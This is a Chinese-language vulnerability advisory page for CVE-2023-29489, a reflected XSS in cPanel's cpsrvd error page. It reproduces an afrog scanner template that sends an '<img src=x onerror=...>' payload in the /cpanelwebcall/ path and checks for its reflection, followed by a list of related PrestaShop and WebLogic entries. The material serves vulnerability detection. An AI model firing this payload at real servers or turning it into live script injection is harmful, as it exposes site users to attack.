CVE-2023-29489: cPanel - Cross-Site Scripting

日期: 2025-09-01 | 影响软件: cPanel | POC: 已公开

漏洞描述

介绍:在 11.109.9999.116 之前的 cPanel 中发现了一个问题。XSS 可以通过无效的网络调用 ID(也称为 SEC-669)出现在 cpsrvd 错误页面上。固定版本为 11.109.9999.116、11.108.0.13、11.106.0.18 和 11.102.0.31。

PoC代码[已公开]

id: CVE-2023-29489

info:
  name: cPanel - Cross-Site Scripting
  author: derian
  severity: medium
  verified: true
  description: |
   介绍:在 11.109.9999.116 之前的 cPanel 中发现了一个问题。XSS 可以通过无效的网络调用 ID(也称为 SEC-669)出现在 cpsrvd 错误页面上。固定版本为 11.109.9999.116、11.108.0.13、11.106.0.18 和 11.102.0.31。
  reference:
  - https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/

rules:
  r0:
    request:
      method: GET
      path: /cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
    expression: response.status == 400 && response.body.bcontains(b'<img src=x onerror="prompt(1)">') && response.body.bcontains(b'Invalid webcall ID:')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-29489.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

weblogic-panel: Weblogic Login Panel POC

CVE-2023-29489: cPanel < 11.109.9999.116 - Cross-Site Scripting POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

PrestaShop /module/askforaquote/QuotesCart SQL 注入漏洞（CVE-2023-27843） 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC

PrestaShop /module/askforaquote/QuotesCart SQL 注入漏洞（CVE-2023-27843）无POC